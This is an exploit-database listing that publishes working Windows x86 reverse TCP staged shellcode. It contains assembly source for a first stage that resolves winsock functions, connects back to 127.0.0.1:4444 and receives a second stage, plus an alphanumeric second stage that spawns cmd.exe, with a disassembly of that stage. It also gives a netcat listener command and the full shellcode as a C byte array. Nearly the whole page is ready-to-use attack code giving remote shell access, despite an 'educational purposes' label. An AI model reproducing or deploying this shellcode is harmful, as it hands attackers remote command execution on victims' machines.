Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)



EKU-ID: 6341 CVE: OSVDB-ID:
Author: Snir Levi Published: 2017-03-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
            ########### Author: Snir Levi, Applitects #############
                                ## 332 Bytes ##
                    ## For Educational Purposes Only ##
                                
Date: 01.03.17
Author: Snir Levi
Email: snircontact@gmail.com
https://github.com/snir-levi/
 
IP -    127.0.0.1
PORT -  4444    
 
Tested on:
Windows 7
Windows 10
                                            ###Usage###
                Victim Executes the first stage shellcode, and opens tcp connection
                After Connection is established, send the Alphanumeric stage to the connection     
                        
                nc -lvp 4444
                connect to [127.0.0.1] from localhost [127.0.0.1] (port)
                RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
                
                Microsoft Windows [Version 10.0.14393]
                (c) 2016 Microsoft Corporation. All rights reserved.
                
                C:\Users\>
                                            ###########
                                            
                                            
                                            
##Shellcode##
                    
 
#### Second Stage Alphanumeric shellcode: #####
 
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
 
 
R       push edx
P       push eax
hoces   push 0x7365636f //oces
htePr   push 0x72506574 //tePr
hCrea   push 0x61657243 //Crea
T       push esp
Q       push ecx
PX      will be replaced with call [esi] (0x16ff)
L*8     dec esp // offset esp to kernel32.dll Address
Y       pop ecx // ecx = kernel32
F*4     inc esi -> offset [esi+4]
PX      will be replaced with mov [esi],eax (0x0689)
N*4     dec esi -> offset [esi]
j0      push 0x30
X       pop eax
H*48    dec eax  // zeroing eax
P       push eax
hessA   push 0x41737365 //essA (will be null terminated)
hProc   push 0x636f7250 //Proc
hExit   push 0x74697845 //Exit
T       push esp
Q       push ecx
PX      will be replaced with call [esi] (0x16ff)
F*8     inc esi -> offset [esi+8]
PX      will be replaced with mov [esi],eax (0x0689)
Z*10    offset stack to &processinfo
j0      push 0x30
Y       pop ecx
I*48    dec ecx  // zeroing ecx
T       push esp
X       pop eax  //eax = &PROCESS_INFORMATION
Q*4     push ecx //sub esp,16
W       push edi
W       push edi
W       push edi
Q       push ecx
Q       push ecx
B       inc edx
R       push edx
Q*10    push ecx
jD      push 0x44
T       push esp
Z       pop edx  //edx = &STARTUPINFOA
hexeC   push 0x65
hcmd.   push 0x78652e64
T       push esp // &'cmd.exe'
Y       pop ecx
P       push eax // &PROCESS_INFORMATION
R       push edx // &STARTUPINFOA
j0      push 0x30
Z       pop edx
J*48    dec edx // zeroing edx
R*3     push edx
B       inc edx
R       push edx
J       dec edx
R*2     push edx
Q       push ecx ; &'cmd.exe'
R       push edx
A*7     inc ecx //offset ecx to [C]exeh -> will be null terminated
N*4     dec esi //offset [esi+4] to CreateProccesA
S       push ebx ; return address
                   
                                    
                
## First Stage Shellcode ##
                
                
global _start
 
section .text
 
 
_start:
    xor eax,eax
    push eax ; null terminator for createProcA
    
    mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
    mov eax,[eax+0xc]
    mov esi,[eax+0x14]
    lodsd
    xchg esi,eax
    lodsd
    mov ebx,[eax+0x10] ; kernel32
    
    mov ecx,[ebx+0x3c] ; DOS->elf_anew
    add ecx, ebx; Skip to PE start
    mov ecx, [ecx+0x78] ; offset to export table
    add ecx,ebx ; kernel32 image_export_dir
    
    mov esi,[ecx+0x20] ; Name Table
    add esi,ebx
    
    xor edx,edx
    
    getProcAddress:
        inc edx
        lodsd
        add eax,ebx
        cmp dword [eax],'GetP'
        jne getProcAddress
        cmp dword [eax+4],'rocA'
        jne getProcAddress
    
    ;---Function Adresses Chain----
    ;[esi]      GetProcAddress
    ;[esi+12]   WSAstartup
    ;[esi+16]   WSASocketA
    ;[esi+20]   connect
    ;[esi+24]   recv
    ;[esi+28]   kernel32
    
    ;Alphanumeric stage store:
    ;[esi+4]    CreateProcessA
    ;[esi+8]    ExitProccess
    
    
    mov esi,[ecx+0x1c] ; Functions Addresses Chain
    add esi,ebx
    mov edx,[esi+edx*4]
    add edx,ebx ; GetProcAddress
    
    sub esp, 32 ; Buffer for the function addresses chain
    push esp
    pop esi
    mov [esp],edx ; esi offset 0 -> GetProcAddress
    mov [esi+28],ebx ;esi offset 28 -> kernel32
    
    ;--------winsock2.dll Address--------------
    xor edi,edi
    push edi
    push 0x41797261 ; Ayra
    push 0x7262694c ; rbiL
    push 0x64616f4c ; daoL
    push esp
    push ebx
    
    call [esi]
    
    ;-----ws2_32.dll Address-------
    xor ecx,ecx
    push ecx
    mov cx, 0x3233   ; 0023
    push ecx
    push 0x5f327377  ; _2sw
    push esp
    
    call eax
    mov ebp,eax ;ebp = ws2_32.dll
    
    ;-------WSAstartup Address-------------
    xor ecx,ecx
    push ecx
    mov cx, 0x7075      ; 00up
    push ecx
    push 0x74726174     ; trat
    push 0x53415357     ; SASW
    push esp
    push ebp
    
    call [esi]
    mov [esi+12],eax ;esi offset 12 -> WSAstartup
    
    ;-------WSASocketA Address-------------
    xor ecx,ecx
    push ecx
    mov cx, 0x4174 ; 00At
    push ecx
    push 0x656b636f ; ekco
    push 0x53415357 ; SASW
    push esp
    push ebp
    
    call [esi]
    mov [esi+16],eax;esi offset 16 -> WSASocketA
    
    ;------connect Address-----------
    push edi
    mov ecx, 0x74636565 ; '\0tce'
    shr ecx, 8
    push ecx
    push 0x6e6e6f63     ; 'nnoc'
    push esp
    push ebp
    
    call [esi]
    mov [esi+20],eax;esi offset 20 -> connect
    
    ;------recv Address-------------
    push edi
    push 0x76636572 ;vcer
    push esp
    push ebp
    
    call [esi]
    mov [esi+24],eax;esi offset 24 -> recv
    
    ;------call WSAstartup()----------
    xor ecx,ecx
    sub sp,700
    push esp
    mov cx,514
    push ecx
    call [esi+12]
        
    ;--------call WSASocket()-----------
    ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
    ; IPPROTO_TCP = 6, NULL,
    ;(unsigned int)NULL, (unsigned int)NULL);
    
    push eax ; if successful, eax = 0
    push eax
    push eax
    mov al,6
    push eax
    mov al,1
    push eax
    inc eax
    push eax
    
    call [esi+16]
    xchg eax, edi   ; edi = SocketRefernce
    
    
    ;--------call connect----------
 
    ;struct sockaddr_in {
    ;   short   sin_family;
    ;   u_short sin_port;
    ;   struct  in_addr sin_addr;
    ;   char    sin_zero[8];
    ;};
    
 
    push byte 0x1
    pop edx
    shl edx, 24
    mov dl, 0x7f    ;edx = 127.0.0.1 (hex)
    push edx
    push word 0x5c11; port 4444
    push word 0x2
    
    ;int connect(
    ;_In_ SOCKET                s,
    ;_In_ const struct sockaddr *name,
    ;_In_ int                   namelen
    ;);
    
    mov edx,esp
    push byte 16 ; sizeof(sockaddr)
    push edx ; (sockaddr*)
    push edi ; socketReference
    
    call [esi+20]
    
    
    ;--------call recv()----------
    
    ;int recv(
    ;_In_  SOCKET s,
    ;_Out_ char   *buf,
    ;_In_  int    len,
    ;_In_  int    flags
    ;);
        
    
stage:
    push eax
    mov ax,950
    push eax    ;buffer length
    push esp
    pop ebp
    sub ebp,eax ; set buffer to [esp-950]
    push ebp    ;&buf
    push edi    ;socketReference
    
    call [esi+24]
    
executeStage:
    xor edx,edx
    mov byte [ebp+eax-1],0xc3   ; end of the Alphanumeric buffer -> ret
    mov byte [ebp+96],dl ; null terminator to ExitProcess
    mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
    dec ebp
    mov word [ebp+20],0x16ff ; call DWORD [esi]
    mov word [ebp+35],0x0689 ; mov [esi],eax
    mov word [ebp+110],0x16ff; call DWORD [esi]
    mov word [ebp+120],0x0689; mov [esi],eax
    mov ax,0x4173 ; As (CreateProcessA)
    mov ecx,[esi+28] ; ecx = kernel32
    dec dl ;edx = 0x000000ff
    call ebp ; Execute Alphanumeric stage
executeShell:
    mov [ecx],dl    ;null terminator to 'cmd.exe'
    call dword [esi] ;createProcA
    push eax
    call dword [esi+4] ; ExitProccess
    
    
    
    -----------------------
    
unsigned char shellcode[]=
"\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";